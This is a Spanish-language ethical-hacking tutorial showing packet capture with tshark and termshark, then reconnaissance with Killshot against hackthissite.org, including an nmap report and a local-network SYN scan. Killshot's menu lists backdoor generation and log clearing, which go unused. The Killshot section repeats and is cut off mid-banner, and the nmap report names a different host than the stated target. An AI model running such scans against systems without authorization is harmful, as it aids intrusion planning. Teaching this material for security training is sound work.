  • Para comprobar la interfaz de red, escriba iwconfig
root@kali:~/go# iwconfig
 wlan0     IEEE 802.11  ESSID:"H###W##"
           Mode:Managed  Frequency:2.457 GHz  Access Point: ##:##:##:8D:##:E4
           Bit Rate=65 Mb/s   Tx-Power=20 dBm
           Retry short limit:7   RTS thr=2347 B   Fragment thr:off
           Encryption key:off
           Power Management:on
           Link Quality=67/70  Signal level=-43 dBm
           Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
           Tx excessive retries:0  Invalid misc:74   Missed beacon:0
  • Escriba tshark -i wlan0
  • -i se utiliza para asignar interfaz de red
  • Esta consulta comenzará a capturar paquetes locales
root@kali:~/Downloads# tshark -i wlan0
 Running as user "root" and group "root". This could be dangerous.
 Capturing on 'wlan0'
     1 0.000000000  192.168.1.3 → 192.168.1.10 TCP 60 3047 → 22 [ACK] Seq=1 Ack=1 Win=253 Len=0
     2 0.589627876 192.168.1.10 → 192.168.1.3  SSH 214 Server: Encrypted packet (len=160)
     3 0.799904360  192.168.1.3 → 192.168.1.10 TCP 60 3047 → 22 [ACK] Seq=1 Ack=161 Win=252 Len=0
     4 1.103457921 192.168.1.10 → 192.168.1.3  SSH 310 Server: Encrypted packet (len=256)
     5 1.302880225  192.168.1.3 → 192.168.1.10 TCP 60 3047 → 22 [ACK] Seq=1 Ack=417 Win=251 Len=0
     6 1.615306911 192.168.1.10 → 192.168.1.3  SSH 310 Server: Encrypted packet (len=256)
     7 1.815734300  192.168.1.3 → 192.168.1.10 TCP 60 3047 → 22 [ACK] Seq=1 Ack=673 Win=256 Len=0
     8 2.127450002 192.168.1.10 → 192.168.1.3  SSH 310 Server: Encrypted packet (len=256)
     9 2.335133706  192.168.1.3 → 192.168.1.10 TCP 60 3047 → 22 [ACK] Seq=1 Ack=929 Win=255 Len=0
    10 2.639471642 192.168.1.10 → 192.168.1.3  SSH 310 Server: Encrypted packet (len=256)
    11 2.850235384  192.168.1.3 → 192.168.1.10 TCP 60 3047 → 22 [ACK] Seq=1 Ack=1185 Win=254 Len=0
    12 3.151440488 192.168.1.10 → 192.168.1.3  SSH 310 Server: Encrypted packet (len=256)
    13 3.360222085  192.168.1.3 → 192.168.1.10 TCP 60 3047 → 22 [ACK] Seq=1 Ack=1441 Win=253 Len=0
    14 3.539527427  192.168.1.3 → 239.255.255.250 SSDP 216 M-SEARCH * HTTP/1.1
  • La consulta anterior ha capturado paquetes TCP con secuencia y confirmación. El número de secuencia se utiliza para dividir los datos grandes en uno más pequeño. Mencionando cada dirección IP con cada protocolo de red
  • El campo Número de acuse de recibo contiene el siguiente número de secuencia que el remitente del acuse de recibo espera recibir
  • El análisis completo del número de secuencia y el número de confirmación es una parte interesante de los cursos de piratería ética ofrecidos por el Instituto Internacional de Seguridad Cibernética en Delhi, India
Capturar el paquete deseado de datos
  • Escriba tshark -i wlan0 UDP
  • -i se utiliza para mencionar la interfaz de red. wlan0 es nuestra interfaz de red
  • tshark capturará solo paquetes UDP
root@kali:~# tshark -i wlan0 udp
 0Running as user "root" and group "root". This could be dangerous.
 Capturing on 'wlan0'
     1 0.000000000 192.168.1.10 → 192.168.1.255 BROWSER 243 Host Announcement DESKTOP-382RT0N, Workstation, Server, NT Workstation
     2 10.047894475  192.168.1.6 → 192.168.1.1  DNS 71 Standard query 0x575b A youtube.com
     3 10.047935767  192.168.1.6 → 192.168.1.1  DNS 71 Standard query 0x1367 AAAA youtube.com
     4 10.068684885  192.168.1.1 → 192.168.1.6  DNS 314 Standard query response 0x575b A youtube.com A 216.58.200.174 NS ns3.google.com NS ns4.google.com NS ns2.google.com NS ns1.google.com A 216.239.32.10 A 216.239.34.10 A 216.239.36.10 A 216.239.38.10 AAAA 2001:4860:4802:32::a AAAA 2001:4860:4802:36::a AAAA 2001:4860:4802:38::a
     5 10.136276096  192.168.1.1 → 192.168.1.6  DNS 326 Standard query response 0x1367 AAAA youtube.com AAAA 2404:6800:4002:811::200e NS ns1.google.com NS ns2.google.com NS ns4.google.com NS ns3.google.com A 216.239.32.10 A 216.239.34.10 A 216.239.36.10 A 216.239.38.10 AAAA 2001:4860:4802:32::a AAAA 2001:4860:4802:36::a AAAA 2001:4860:4802:38::a
     6 10.352876669  192.168.1.6 → 192.168.1.1  DNS 73 Standard query 0x05c2 A ocsp.pki.goog
     7 10.358805848  192.168.1.1 → 192.168.1.6  DNS 344 Standard query response 0x05c2 A ocsp.pki.goog CNAME pki-goog.l.google.com A 172.217.166.3 NS ns1.google.com NS ns2.google.com NS ns4.google.com NS ns3.google.com A 216.239.32.10 A 216.239.34.10 A 216.239.36.10 A 216.239.38.10 AAAA 2001:4860:4802:32::a AAAA 2001:4860:4802:36::a AAAA 2001:4860:4802:38::a
     8 10.556555958  192.168.1.6 → 192.168.1.1  DNS 75 Standard query 0x4d56 A www.youtube.com
     9 10.556594357  192.168.1.6 → 192.168.1.1  DNS 75 Standard query 0xe65e AAAA www.youtube.com
  • UDP (User Datagram Protocol) se usa para enviar mensajes cortos. El tráfico de la red UDP se organiza en forma de datagramas. Su protocolo no confiable y sin conexión
  • La consulta anterior ha recopilado registros diferidos después de asignar el protocolo UDP. En primer lugar, muestra la solicitud se envía al navegador. Luego muestra la solicitud de DNS (Sistema de nombres de dominio) para la URL (youtube.com) con la dirección IP de 216.58.200.174. También puede comprobar lo mismo con nslookup
  • Uso del Servidor de nombres (NS) ns1.google.com con una consulta de DNS estándar
Interfaz GUI basada en la línea de comandos de Termshark
  • Escriba cd termshark_1.0.0_linux_x64
  • Escriba ./termshark -i wlan0
  • -i se utiliza para mencionar la interfaz de red. wlan0 es nuestra interfaz de red
  • Presione el botón ? en el teclado de su computadora
  • La consulta anterior muestra los paquetes capturados y el menú de ayuda
Filtrado de paquetes con GUI basada en línea de comandos
  • Escriba ./termshark -i wlan0
  • -i se utiliza para mencionar la interfaz de red. wlan0 es nuestra interfaz de red.
  • Después de que termshark comenzará a capturar el paquete. En el cuadro de diálogo Filtro, puede ingresar cualquier protocolo. Aquí hemos escrito UDP. Después de escribir UDP, haga clic en Aplicar para capturar solo paquetes UDP
  • La salida anterior muestra la transmisión de paquetes, mostrando la dirección IP de origen y destino con la longitud del paquete. A continuación verás cómo funciona UDP
  • Cada paquete muestra con el tiempo necesario para la transmisión
  • La apertura de los primeros cuadros de paquetes muestra que el paquete es de 216 bytes. Luego muestra el tiempo de llegada y el cambio de tiempo del paquete
  • El análisis adicional muestra la versión de solicitud y el agente de usuario utilizado en la transferencia de paquetes de datos
Sólo ver transmisión de paquetes
  • Escriba ./termshark -i wlan
  • -i se utiliza para mencionar la interfaz de red. wlan0 es nuestra interfaz de red
  • Presione el botón / en el teclado para ver solo la transmisión de paquetes
  • La salida anterior muestra la transmisión de paquetes en la red interna. Puede ver paquetes de transacciones entre dos direcciones IPv4
  • Luego muestra el tamaño de paquete de Ethernet encriptado len = 64. Con Seq = 1 y cambiando el reconocimiento
Abrir archivos PCAP
  • Ahora, muchas veces recibe el archivo pcap durante sus proyectos con el Instituto Internacional de Seguridad Cibernética para analizar el flujo de paquetes y realizar actividades forenses cibernéticas en el archivo pcap
  • Puede abrir cualquier archivo guardado desde cualquier otro analizador de red. Aquí hemos abierto otro archivo pcap que se guardó después de capturar la red interna con wireshark
  • Para abrir archivos pcap., escriba ./termshark -r wlan0-299382837.pcap
  • -r se usa para mencionar el archivo pcap. 299382837 es un archivo pcap
  • La captura de pantalla de arriba muestra la transmisión de paquetes de los protocolos de red UDP e ICMP. Además, muestra la transmisión de paquetes utilizando HTTP 1.1 con el tiempo que tomó transferir paquetes desde la dirección IP de origen a destino

Realice auditorías de seguridad en cualquier sitio web con Killshot

La herramienta KillShot puede rastrear una aplicación web objetivo y encontrar su tecnología web back-end, identificar sistemas de administración de contenido (CMS) utilizado, así como escanear puertos abiertos con servicios en ejecución. Con la ayuda de otras herramientas de hacking, como Whatweb, Dig, Fierce o Identifies CMS, Killshot puede escanear y recolectar información sobre cualquier sitio web. El uso de Killshot, así como del resto de herramientas antes mencionadas, forma parte de los temas del curso de hacking ético del Instituto Internacional de Seguridad Cibernética (IICS).




Instalación
  • Esta herramienta fue probada en Kali Linux 2018.2
  • Abra el terminal y escriba git clone https://github.com/bahaabdelwahed/killshot
  • Cuando se descargue, escriba cd killshot
  • Luego escriba ruby setup.rb (si la configuración muestra algún error, intente instalar las herramienta manualmente)
  • La solicitud de algunos permisos tomará un tiempo, presione siempre SÍ y continúe con la instalación. Para ejecutar la herramienta, escriba ruby killshot.rb
  • Luego escriba help
Uso
  • Estamos utilizando www.hackthissite.org como sitio web objetivo
  • Después de la opción help, elija el sitio e ingrese
root@kali:~/killshot# ruby Killshot.rb
 ██╗  ██╗██╗██╗     ██╗         ███████╗██╗  ██╗ ██████╗ ████████╗
 ██║ ██╔╝██║██║     ██║         ██╔════╝██║  ██║██╔═══██╗╚══██╔══╝
 █████╔╝ ██║██║     ██║         ███████╗███████║██║   ██║   ██║
 ██╔═██╗ ██║██║     ██║         ╚════██║██╔══██║██║   ██║   ██║
 ██║  ██╗██║███████╗███████╗    ███████║██║  ██║╚██████╔╝   ██║
 ╚═╝  ╚═╝╚═╝╚══════╝╚══════╝    ╚══════╝╚═╝  ╚═╝ ╚═════╝    ╚═╝
                                <Track my Target>       Gather information                                                            About Targets
 track>>> : help
 [site] MAKE YOUR TARGET
 [help] show this MESSAGE
 [targ] Search targets
 [exit] exit the script
 [uptd] Update KillShot
 [anon] Run Anonymous Mode
 [info] About killShot
 track>>> :
  • Luego ingrese el sitio web que desea escanear. Estamos usando www.hackthissite.org
  • Escriba www.hackthissite.org y pulse enter

       .n                   .                 .                  n.
  .   .dP                  dP                   9b                 9b.    .
 4    qXb         .       dX                     Xb       .        dXp     t
dX.    9Xb      .dXb    __                         __    dXb.     dXP     .Xb
9XXb._       _.dXXXXb dXXXXbo.                 .odXXXXb dXXXXb._       _.dXXP
 9XXXXXXXXXXXXXXXXXXXVXXXXXXXXOo.           .oOXXXXXXXXVXXXXXXXXXXXXXXXXXXXP
  `9XXXXXXXXXXXXXXXXXXXXX'~   ~`OOO8b   d8OOO'~   ~`XXXXXXXXXXXXXXXXXXXXXP'
    `9XXXXXXXXXXXP' `9XX'   Hide    `98v8P'  Hack   `XXP' `9XXXXXXXXXXXP'
        ~~~~~~~       9X.          .db|db.          .XP       ~~~~~~~
                        )b.  .dbo.dP'`v'`9b.odb.  .dX
{0} Spider
 {1} Web technologie
 {2} WebApp Vul Scanner
 {3} Port Scanner
 {4} CMS Scanner
 {5} Fuzzers
 {6} Cms Exploit Scanner
 {7} Backdoor Generation
 {8} Linux Log Clear
 {9} Find MX/NS
 info>>> :
  • Ahora mostrará múltiples opciones, puedes usar cualquiera de ellas
  • Aquí estamos utilizando 0 spider
info>>> : 0
  ip For www.hackthissite.org :: "137.74.187.104"
 Links And Paths  ::
 Related domains and Parameters ::
 https://www.hackthissite.org
 irc://irc.hackthissite.org:+7000/
 https://www.hackthissite.org/forums
 https://www.cafepress.com/htsstore
 https://hts.io
 https://twitter.com/hackthissite
 /
 https://www.hackthissite.org/TNG355Q5B85cL3PDeI88H0dLCRYaA776flCTc4MX0u136lQ4hP94cZSnOFheqEU9zT8k6WDlcG17HglFDUi0Tg7kH42bzckCR4Q2ZQ
 https://www.hackthissite.org/advertise/
 /user/login
 /register
 /user/resetpass
 https://www.hackthissite.org/donate/
 /missions/basic/
 /missions/realistic/
 /missions/application/
 /missions/programming/
 /missions/phonephreaking/
 /missions/javascript/
 /missions/forensic/
 /missions/playit/extbasic/0/
 /missions/playit/stego/0/
 irc://irc.hackthissite.org/htb
 /blogs
 /news
 /pages/articles/article.php
 /lectures
 /pages/programs/programs.php
 http://mirror.hackthissite.org/hackthiszine/
  • Esta salida mostrará las páginas rastreadas del dominio objetivo. También mostró el inicio de sesión del usuario y el registro de las páginas del objetivo
  • Y luego estamos usando la opción (1) web technologie, esta opción escaneará el sitio web utilizando WhatWeb Information, Dig y también intentará la transferencia de zona y la fuerza bruta, el resultado de la ruta de rastreo y la detección de cortafuegos e IDS
info>>> : 1
  [+]Basic WhatWeb Information  ::
  terminated with exception (report_on_exception is true):
 Traceback (most recent call last):
         2542: from /usr/bin/whatweb:981:in block (2 levels) in <main>'         2541: from /usr/bin/whatweb:981:inloop'
         2540: from /usr/bin/whatweb:988:in block (3 levels) in <main>'         2539: from /usr/share/whatweb/lib/target.rb:96:inopen'
         2538: from /usr/share/whatweb/lib/target.rb:188:in open_url'         2537: from /usr/lib/ruby/2.5.0/net/http.rb:1455:inrequest'
         2536: from /usr/lib/ruby/2.5.0/net/http.rb:909:in start'         2535: from /usr/lib/ruby/2.5.0/net/http.rb:920:indo_start'
          … 2530 levels…
            4: from /usr/lib/ruby/2.5.0/resolv.rb:524:in block in fetch_resource'            3: from /usr/lib/ruby/2.5.0/resolv.rb:769:insender'
            2: from /usr/lib/ruby/2.5.0/resolv.rb:629:in allocate_request_id'            1: from /usr/lib/ruby/2.5.0/resolv.rb:629:insynchronize'
 /usr/lib/ruby/2.5.0/resolv.rb:630:in block in allocate_request_id': stack level too deep (SystemStackError) Traceback (most recent call last):         2542: from /usr/bin/whatweb:981:inblock (2 levels) in 
'
.-------------------------SNIP---------------------------------------------
         2541: from /usr/bin/whatweb:981:in loop'         2540: from /usr/bin/whatweb:988:inblock (3 levels) in '
         2539: from /usr/share/whatweb/lib/target.rb:96:in open'         2538: from /usr/share/whatweb/lib/target.rb:188:inopen_url'
         2537: from /usr/lib/ruby/2.5.0/net/http.rb:1455:in request'         2536: from /usr/lib/ruby/2.5.0/net/http.rb:909:instart'
         2535: from /usr/lib/ruby/2.5.0/net/http.rb:920:in do_start'          ... 2530 levels...            4: from /usr/lib/ruby/2.5.0/resolv.rb:524:inblock in fetch_resource'
            3: from /usr/lib/ruby/2.5.0/resolv.rb:769:in sender'            2: from /usr/lib/ruby/2.5.0/resolv.rb:629:inallocate_request_id'
            1: from /usr/lib/ruby/2.5.0/resolv.rb:629:in synchronize' /usr/lib/ruby/2.5.0/resolv.rb:630:inblock in allocate_request_id': stack level too deep (SystemStackError)
  [+]Host Result ::
 www.hackthissite.org has address 137.74.187.100
 www.hackthissite.org has address 137.74.187.103
 www.hackthissite.org has address 137.74.187.104
 www.hackthissite.org has address 137.74.187.102
 www.hackthissite.org has address 137.74.187.101
 www.hackthissite.org has IPv6 address 2001:41d0:8:ccd8:137:74:187:102
 www.hackthissite.org has IPv6 address 2001:41d0:8:ccd8:137:74:187:103
 www.hackthissite.org has IPv6 address 2001:41d0:8:ccd8:137:74:187:101
 www.hackthissite.org has IPv6 address 2001:41d0:8:ccd8:137:74:187:104
 www.hackthissite.org has IPv6 address 2001:41d0:8:ccd8:137:74:187:100
  [+]Dig Result About Dns::
 ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 7021 ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1 ;8.8.8.8.                       IN      A ;; AUTHORITY SECTION: .                       6767    IN      SOA     a.root-servers.net. nstld.verisign-grs.com. 2019050800 1800 900 604800 86400 ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 5506
 ;; flags: qr rd ra ad; QUERY: 1, ANSWER: 5, AUTHORITY: 0, ADDITIONAL: 0
 ;www.hackthissite.org.          IN      A
 ;; ANSWER SECTION:
 www.hackthissite.org.   2440    IN      A       137.74.187.100
 www.hackthissite.org.   2440    IN      A       137.74.187.103
 www.hackthissite.org.   2440    IN      A       137.74.187.104
 www.hackthissite.org.   2440    IN      A       137.74.187.102
 www.hackthissite.org.   2440    IN      A       137.74.187.101
  [+]Trying zone transfer and Brute force ::
 Option w is ambiguous (wide, wordlist)
 Trying zone transfer first…
 Unsuccessful in zone transfer (it was worth a shot)
 Okay, trying the good old fashioned way… brute force
 Checking for wildcard DNS…
 Nope. Good.
 Now performing 2280 test(s)…
 Subnets found (may want to probe here using nmap or unicornscan):
 Done with Fierce scan: http://ha.ckers.org/fierce/
 Found 0 entries.
 Have a nice day.
  • Esta salida mostrará la información básica de un sitio web. Su escaneo detectó aplicaciones, servidores web y otras tecnologías. También escanea los encabezados HTTP del servidor web y el origen HTML de un destino.
  • Resultado del host: muestra la dirección IP del host del sitio web y también analiza IPv4 o IPv6 de un sitio web.
  • También escanea el Firewall y el IDS en el destino (No se detectó WAF por la detección genérica) significa NO WAF (Firewall de aplicación web).La herramienta Dig se usa para consultar servidores de nombres DNS, para obtener información como direcciones de host, servidor de correo, servidores de nombres e información relacionada. También se encuentran los registros A del objetivo
NOTA: PARA OBTENER TODAS LAS OPCIONES NO NECESITA DESPLAZARSE, SÓLO ESCRIBA BANNER Y SE MOSTRARÁN TODAS LAS OPCIONES
  • Y ahora usaremos la opción {3} Port Scanner, este escaneará puertos de destino completos utilizando dos herramientas: nmap y unicorn scan
Escaneo con Nmap
  • Elija cualquiera de ellos
            _        _____  /        | |      / ____| /    _   _| |_ ___| (___   ___ __ _ _ __  _ __   ___ _ __
 / / | | | | / _ _  / / ` | ' | '_  / _  '|
   / _  || | || () |) | (| (| | | | | | | |  / |  //    ,|// ,|| ||| ||__|_|
 [0] Nmap Scan
 [1] Unicorn Scan
 Scanner >>0
  • Escriba 0
            _        _____  /        | |      / ____| /    _   _| |_ ___| (___   ___ __ _ _ __  _ __   ___ _ __
 / / | | | | / _ _  / / ` | ' | '_  / _  '|
   / _  || | || () |) | (| (| | | | | | | |  / |  //    ,|// ,|| ||| ||__|_|
 [0] Nmap Scan
 [1] Unicorn Scan
 Scanner >>0
 [2] Nmap Os Scan
 [3] Nmap TCP Scan
 [4] Nmap UDB Scan
 [5] Nmap All scan
 [6] Nmap Http Option Scan
 [7] Nmap Live target In Network
 Scanner >>
  • Mostrará todas las opciones de Nmap
            _        _____  /        | |      / ____| /    _   _| |_ ___| (___   ___ __ _ _ __  _ __   ___ _ __
 / / | | | | / _ _  / / ` | ' | '_  / _  '|
   / _  || | || () |) | (| (| | | | | | | |  / |  //    ,|// ,|| ||| ||__|_|
 [0] Nmap Scan
 [1] Unicorn Scan
 Scanner >>0
 [2] Nmap Os Scan
 [3] Nmap TCP Scan
 [4] Nmap UDB Scan
 [5] Nmap All scan
 [6] Nmap Http Option Scan
 [7] Nmap Live target In Network
 Scanner >>5
 Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-09 05:59 EDT
 Nmap scan report for www.acunetix.com (54.208.84.166)
 Host is up (0.24s latency).
 rDNS record for 54.208.84.166: ec2-54-208-84-166.compute-1.amazonaws.com
 Not shown: 998 filtered ports
 PORT    STATE SERVICE  VERSION
 80/tcp  open  http     nginx
 |http-server-header: acunetix.com |_http-title: Did not follow redirect to https://acunetix.com/ 443/tcp open  ssl/http nginx | http-robots.txt: 3 disallowed entries |/dontVisitMe/ /blog/worldsecuritynews/* /
 |_http-server-header: acunetix.com
 |_http-title: 400 The plain HTTP request was sent to HTTPS port
 | ssl-cert: Subject: commonName=.acunetix.com/organizationName=Acunetix Ltd/stateOrProvinceName=ST. JULIANS/countryName=MT | Subject Alternative Name: DNS:.acunetix.com, DNS:acunetix.com
 | Not valid before: 2018-10-24T00:00:00
 |_Not valid after:  2020-11-18T12:00:00
 Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
 Device type: media device|specialized|general purpose
 Running: Crestron embedded, Wago Kontakttechnik embedded, Linux 2.4.X
 OS CPE: cpe:/h:crestron:mpc-m5 cpe:/h:wago_kontakttechnik:750-852 cpe:/o:linux:linux_kernel:2.4.26
 OS details: Crestron MPC-M5 AV controller or Wago Kontakttechnik 750-852 PLC, Linux 2.4.26 (Slackware 10.0.0)
 TRACEROUTE (using port 80/tcp)
 HOP RTT     ADDRESS
 1   …
 2   4.06 ms 115.97.136.1
 3   … 30
 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 Nmap done: 1 IP address (1 host up) scanned in 58.15 seconds
  • Nmap TCP Scan muestra los puertos abiertos y cerrados de TCP. Este es uno de los temas más relevantes del curso de hacking ético del IICS
Escaneo de Unicorn
  • Ahora analizaremos la herramienta Unicorn. Debe seguir todos los pasos para obtener la opción de escaneo de puertos y luego seleccionar 1
            _        _____  /        | |      / ____| /    _   _| |_ ___| (___   ___ __ _ _ __  _ __   ___ _ __
 / / | | | | / _ _  / / ` | ' | '_  / _  '|
   / _  || | || () |) | (| (| | | | | | | |  / |  //    ,|// ,|| ||| ||__|_|
 [0] Nmap Scan
 [1] Unicorn Scan
 Scanner >>1
 [8] Services OS
 [9] TCP SYN Scan on a whole network
 [01] UDP scan on the whole network
 Scanner >>
  • Se mostrarán los tipos de escaneados disponibles
  • Deje que seleccione [9] TCP SYN Scan en una red completa y le pedirá una dirección IP 192.168.1.1 del enrutador
            _        _____  /        | |      / ____| /    _   _| |_ ___| (___   ___ __ _ _ __  _ __   ___ _ __
 / / | | | | / _ _  / / ` | ' | '_  / _  '|
   / _  || | || () |) | (| (| | | | | | | |  / |  //    ,|// ,|| ||| ||__|_|
 [0] Nmap Scan
 [1] Unicorn Scan
 Scanner >>1
 [8] Services OS
 [9] TCP SYN Scan on a whole network
 [01] UDP scan on the whole network
 Scanner >>9
 Your Router Ip : 192.168.1.1
  • Deje que el escaneo continúe
            _        _____  /        | |      / ____| /    _   _| |_ ___| (___   ___ __ _ _ __  _ __   ___ _ __
 / / | | | | / _ _  / / ` | ' | '_  / _  '|
   / _  || | || () |) | (| (| | | | | | | |  / |  //    ,|// ,|| ||| ||__|_|
 [0] Nmap Scan
 [1] Unicorn Scan
 Scanner >>1
 [8] Services OS
 [9] TCP SYN Scan on a whole network
 [01] UDP scan on the whole network
 Scanner >>9
 Your Router Ip : 192.168.1.1
 adding 192.168.1.0/24 mode TCPscan' ports7,9,11,13,18,19,21-23,25,37,39,42,49,50,53,65,67-70,79-81,88,98,100,105-107,109-111,113,118,119,123,129,135,137-139,143,150,161-164,174,177-179,191,199-202,204,206,209,210,213,220,345,346,347,369-372,389,406,407,422,443-445,487,500,512-514,517,518,520,525,533,538,548,554,563,587,610-612,631-634,636,642,653,655,657,666,706,750-752,765,779,808,873,901,923,941,946,992-995,1001,1023-1030,1080,1210,1214,1234,1241,1334,1349,1352,1423-1425,1433,1434,1524,1525,1645,1646,1649,1701,1718,1719,1720,1723,1755,1812,1813,2048-2050,2101-2104,2140,2150,2233,2323,2345,2401,2430,2431,2432,2433,2583,2628,2776,2777,2988,2989,3050,3130,3150,3232,3306,3389,3456,3493,3542-3545,3632,3690,3801,4000,4400,4321,4567,4899,5002,5136-5139,5150,5151,5222,5269,5308,5354,5355,5422-5425,5432,5503,5555,5556,5678,6000-6007,6346,6347,6543,6544,6789,6838,6666-6670,7000-7009,7028,7100,7983,8079-8082,8088,8787,8879,9090,9101-9103,9325,9359,10000,10026,10027,10067,10080,10081,10167,10498,11201,15345,17001-17003,18753,20011,20012,21554,22273,26274,27374,27444,27573,31335-31338,31787,31789,31790,31791,32668,32767-32780,33390,47262,49301,54320,54321,57341,58008,58009,58666,59211,60000,60006,61000,61348,61466,61603,63485,63808,63809,64429,65000,65506,65530-65535' pps 300
 using interface(s) eth0
----------------------------------SNIP-------------------------------------
 scaning 2.56e+02 total hosts with 8.65e+04 total packets, should take a little longer than 4 Minutes, 55 Seconds
 connected 192.168.1.12:34682 -> 192.168.1.10:139
 TCP open 192.168.1.10:139  ttl 128
 connected 192.168.1.12:19928 -> 192.168.1.5:139
 TCP open 192.168.1.5:139  ttl 128
 connected 192.168.1.12:57128 -> 192.168.1.3:139
 TCP open 192.168.1.3:139  ttl 128
 connected 192.168.1.12:40890 -> 192.168.1.4:139
 TCP open 192.168.1.4:139  ttl 128
 connected 192.168.1.12:63984 -> 192.168.1.3:3389
 TCP open 192.168.1.3:3389  ttl 128
 connected 192.168.1.12:4474 -> 192.168.1.1:23
 TCP open 192.168.1.1:23  ttl 64
 connected 192.168.1.12:19804 -> 192.168.1.5:445
 TCP open 192.168.1.5:445  ttl 128
 connected 192.168.1.12:17218 -> 192.168.1.10:445
 TCP open 192.168.1.10:445  ttl 128
 connected 192.168.1.12:16075 -> 192.168.1.4:445
 TCP open 192.168.1.4:445  ttl 128
 connected 192.168.1.12:35635 -> 192.168.1.3:445
 TCP open 192.168.1.3:445  ttl 128
 connected 192.168.1.12:59512 -> 192.168.1.1:53
 TCP open 192.168.1.1:53  ttl 64
 connected 192.168.1.12:17273 -> 192.168.1.1:80
 TCP open 192.168.1.1:80  ttl 64
 connected 192.168.1.12:17994 -> 192.168.1.3:554
 TCP open 192.168.1.3:554  ttl 128
 connected 192.168.1.12:10098 -> 192.168.1.4:554
 TCP open 192.168.1.4:554  ttl 128
 connected 192.168.1.12:5254 -> 192.168.1.10:135
 TCP open 192.168.1.10:135  ttl 128
 connected 192.168.1.12:10011 -> 192.168.1.3:135
 TCP open 192.168.1.3:135  ttl 128
 connected 192.168.1.12:19956 -> 192.168.1.4:135
 TCP open 192.168.1.4:135  ttl 128
 connected 192.168.1.12:21180 -> 192.168.1.5:135
 TCP open 192.168.1.5:135  ttl 128
 connected 192.168.1.12:14926 -> 192.168.1.1:443
 TCP open 192.168.1.1:443  ttl 64
 connected 192.168.1.12:17101 -> 192.168.1.10:443
 TCP open 192.168.1.10:443  ttl 128
 connected 192.168.1.12:6074 -> 192.168.1.3:443
 TCP open 192.168.1.3:443  ttl 128
 connected 192.168.1.12:51922 -> 192.168.1.4:443
 TCP open 192.168.1.4:443  ttl 128
 connected 192.168.1.12:13164 -> 192.168.1.6:22
 TCP open 192.168.1.6:22  ttl 64
 sender statistics 177.8 pps with 86528 packets sent total
 listener statistics 2894 packets recieved 0 packets droped and 0 interface drops
 TCP open                  telnet[   23]         from 192.168.1.1  ttl 64
 TCP open                  domain[   53]         from 192.168.1.1  ttl 64
 TCP open                    http[   80]         from 192.168.1.1  ttl 64
 TCP open                   https[  443]         from 192.168.1.1  ttl 64
 TCP open                   epmap[  135]         from 192.168.1.3  ttl 128
 TCP open             netbios-ssn[  139]         from 192.168.1.3  ttl 128
 TCP open                   https[  443]         from 192.168.1.3  ttl 128
 TCP open            microsoft-ds[  445]         from 192.168.1.3  ttl 128
 TCP open                    rtsp[  554]         from 192.168.1.3  ttl 128
 TCP open           ms-wbt-server[ 3389]         from 192.168.1.3  ttl 128
 TCP open                   epmap[  135]         from 192.168.1.4  ttl 128
 TCP open             netbios-ssn[  139]         from 192.168.1.4  ttl 128
 TCP open                   https[  443]         from 192.168.1.4  ttl 128
 TCP open            microsoft-ds[  445]         from 192.168.1.4  ttl 128
 TCP open                    rtsp[  554]         from 192.168.1.4  ttl 128
 TCP open                   epmap[  135]         from 192.168.1.5  ttl 128
 TCP open             netbios-ssn[  139]         from 192.168.1.5  ttl 128
 TCP open            microsoft-ds[  445]         from 192.168.1.5  ttl 128
 TCP open                     ssh[   22]         from 192.168.1.6  ttl 64
 TCP open                   epmap[  135]         from 192.168.1.10  ttl 128
 TCP open             netbios-ssn[  139]         from 192.168.1.10  ttl 128
 TCP open                   https[  443]         from 192.168.1.10  ttl 128
 TCP open            microsoft-ds[  445]         from 192.168.1.10  ttl 128
  • Se escanearán todos los puertos TCP abiertos en el objetivo
connected 192.168.1.12:34682 -> 192.168.1.10:139
 TCP open 192.168.1.10:139  ttl 128
  • También escanean los puertos TCP abiertos y muestra los servicios con puertos
  • Estadísticas del remitente 177.8 pps con 86528 paquetes enviados en total
  • Para escanear utiliza su tarjeta de red local como se muestra a continuación
using interface(s) eth0

Realice auditorías de seguridad en cualquier sitio web con Killshot

Realice auditorías de seguridad en cualquier sitio web con Killshot

La herramienta KillShot puede rastrear una aplicación web objetivo y encontrar su tecnología web back-end, identificar sistemas de administración de contenido (CMS) utilizado, así como escanear puertos abiertos con servicios en ejecución. Con la ayuda de otras herramientas de hacking, como Whatweb, Dig, Fierce o Identifies CMS, Killshot puede escanear y recolectar información sobre cualquier sitio web. El uso de Killshot, así como del resto de herramientas antes mencionadas, forma parte de los temas del curso de hacking ético del Instituto Internacional de Seguridad Cibernética (IICS).




Instalación
  • Esta herramienta fue probada en Kali Linux 2018.2
  • Abra el terminal y escriba git clone https://github.com/bahaabdelwahed/killshot
  • Cuando se descargue, escriba cd killshot
  • Luego escriba ruby setup.rb (si la configuración muestra algún error, intente instalar las herramienta manualmente)
  • La solicitud de algunos permisos tomará un tiempo, presione siempre SÍ y continúe con la instalación. Para ejecutar la herramienta, escriba ruby killshot.rb
  • Luego escriba help
Uso
  • Estamos utilizando www.hackthissite.org como sitio web objetivo
  • Después de la opción help, elija el sitio e ingrese
root@kali:~/killshot# ruby Killshot.rb
 ██╗  ██╗██╗██╗     ██╗         ███████╗██╗  ██╗ ██████╗ ████████╗
 ██║ ██╔╝██║██║     ██║         ██╔════╝██║  ██║██╔═══██╗╚══██╔══╝
 █████╔╝ ██║██║     ██║         ███████╗███████║██║   ██║   ██║
 ██╔═██╗ ██║██║     ██║         ╚════██║██╔══██║██║   ██║   ██║
 ██║  ██╗██║███████╗███████╗    ███████║██║  ██║╚██████╔╝   ██║
 ╚═╝  ╚═╝╚═╝╚══════╝╚══════╝    ╚══════╝╚═╝  ╚═╝ ╚═════╝    ╚═╝
                                <Track my Target>       Gather information                                                            About Targets
 track>>> : help
 [site] MAKE YOUR TARGET
 [help] show this MESSAGE
 [targ] Search targets
 [exit] exit the script
 [uptd] Update KillShot
 [anon] Run Anonymous Mode
 [info] About killShot
 track>>> :
  • Luego ingrese el sitio web que desea escanear. Estamos usando www.hackthissite.org
  • Escriba www.hackthissite.org y pulse enter

       .n                   .                 .                  n.
  .   .dP                  dP                   9b                 9b.    .
 4    qXb         .       dX                     Xb       .        dXp     t
dX.    9Xb      .dXb    __                         __    dXb.     dXP     .Xb
